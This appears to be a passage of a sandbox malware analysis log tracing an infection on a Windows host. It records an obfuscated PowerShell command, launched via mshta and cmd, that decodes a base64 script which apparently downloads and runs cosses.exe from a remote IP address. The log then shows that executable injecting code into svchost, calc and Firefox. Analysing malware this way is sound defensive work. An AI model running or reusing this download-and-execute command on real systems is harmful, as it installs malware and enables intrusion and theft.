                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtResumeThread: Direct from: 0x772736AC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtProtectVirtualMemory: Direct from: 0x77272F9C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtSetInformationProcess: Direct from: 0x77272C5C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtNotifyChangeKey: Direct from: 0x77273C2C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtCreateMutant: Direct from: 0x772735CC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtSetInformationThread: Direct from: 0x772663F9
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtQueryInformationProcess: Direct from: 0x77272C26
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtResumeThread: Direct from: 0x77272FBC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtCreateUserProcess: Direct from: 0x7727371C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtWriteVirtualMemory: Direct from: 0x7727490C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtAllocateVirtualMemory: Direct from: 0x77273C9C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtAllocateVirtualMemory: Direct from: 0x77272BFC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtReadFile: Direct from: 0x77272ADC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtQuerySystemInformation: Direct from: 0x77272DFC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtDelayExecution: Direct from: 0x77272DDC
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\calc.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\calc.exe | Section loaded: NULL target: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe protection: read write
                  Source: C:\Windows\SysWOW64\calc.exe | Section loaded: NULL target: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\calc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                  Source: C:\Windows\SysWOW64\calc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\calc.exe | Thread register set: target process: 8240
                  Source: C:\Windows\SysWOW64\calc.exe | Thread APC queued: target process: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2BC2008
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_001687B1 LogonUserW, 6_2_001687B1
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_00113B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 6_2_00113B3A
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_001148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 6_2_001148D7
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_00174C27 mouse_event, 6_2_00174C27
                  Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'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'+[Char]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'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'+[Char]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\cosses.exe "C:\Users\user\AppData\Roaming\cosses.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A73.tmp" "c:\Users\user\AppData\Local\Temp\fjq1drut\CSC5A43CF9668DC424F8B475C31EBB405.TMP"
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\cosses.exe"
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | Process created: C:\Windows\SysWOW64\calc.exe "C:\Windows\SysWOW64\calc.exe"
                  Source: C:\Windows\SysWOW64\calc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgoxicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurklxrzceugicagicagicagicagicagicagicagicagicagicagicaglw1fbujlcmrfrmlosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vti5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagietmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbiagz1dnvwcenolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicb1ympcb2gsdwludcagicagicagicagicagicagicagicagicagicagicagicbhdxrnsgflleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbnz3dvdmvvt1hkktsnicagicagicagicagicagicagicagicagicagicagicagic1uyu1licagicagicagicagicagicagicagicagicagicagicagicjmiiagicagicagicagicagicagicagicagicagicagicagicatbmfnzxnqywnlicagicagicagicagicagicagicagicagicagicagicagigrobligicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakaje6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4ync81mzavy29zc2vzlmv4zsisiirfbly6qvbqrefuqvxjb3nzzxmuzxhliiwwldapo3n0yvj0lvnsruvqkdmpo2ludk9rzs1pdgvnicagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcy29zc2vzlmv4zsi='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgoxicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurklxrzceugicagicagicagicagicagicagicagicagicagicagicaglw1fbujlcmrfrmlosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vti5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagietmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbiagz1dnvwcenolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicb1ympcb2gsdwludcagicagicagicagicagicagicagicagicagicagicagicbhdxrnsgflleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbnz3dvdmvvt1hkktsnicagicagicagicagicagicagicagicagicagicagicagic1uyu1licagicagicagicagicagicagicagicagicagicagicagicjmiiagicagicagicagicagicagicagicagicagicagicagicatbmfnzxnqywnlicagicagicagicagicagicagicagicagicagicagicagigrobligicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakaje6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4ync81mzavy29zc2vzlmv4zsisiirfbly6qvbqrefuqvxjb3nzzxmuzxhliiwwldapo3n0yvj0lvnsruvqkdmpo2ludk9rzs1pdgvnicagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcy29zc2vzlmv4zsi='+[char]34+'))')))"
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_00167CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 6_2_00167CAF
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0016874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 6_2_0016874B
                  Source: cosses.exe, 00000006.00000002.1471069477.00000000001C4000.00000002.00000001.01000000.00000009.sdmp, cosses.exe.3.dr, cosses[1].exe.3.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000002.3817239248.0000000000C31000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000000.1603500888.0000000000C30000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817384854.0000000001A31000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                  Source: cosses.exe, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000002.3817239248.0000000000C31000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000000.1603500888.0000000000C30000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817384854.0000000001A31000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000002.3817239248.0000000000C31000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000000.1603500888.0000000000C30000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817384854.0000000001A31000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000002.3817239248.0000000000C31000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000000.1603500888.0000000000C30000.00000002.00000001.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817384854.0000000001A31000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0013862B cpuid 6_2_0013862B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
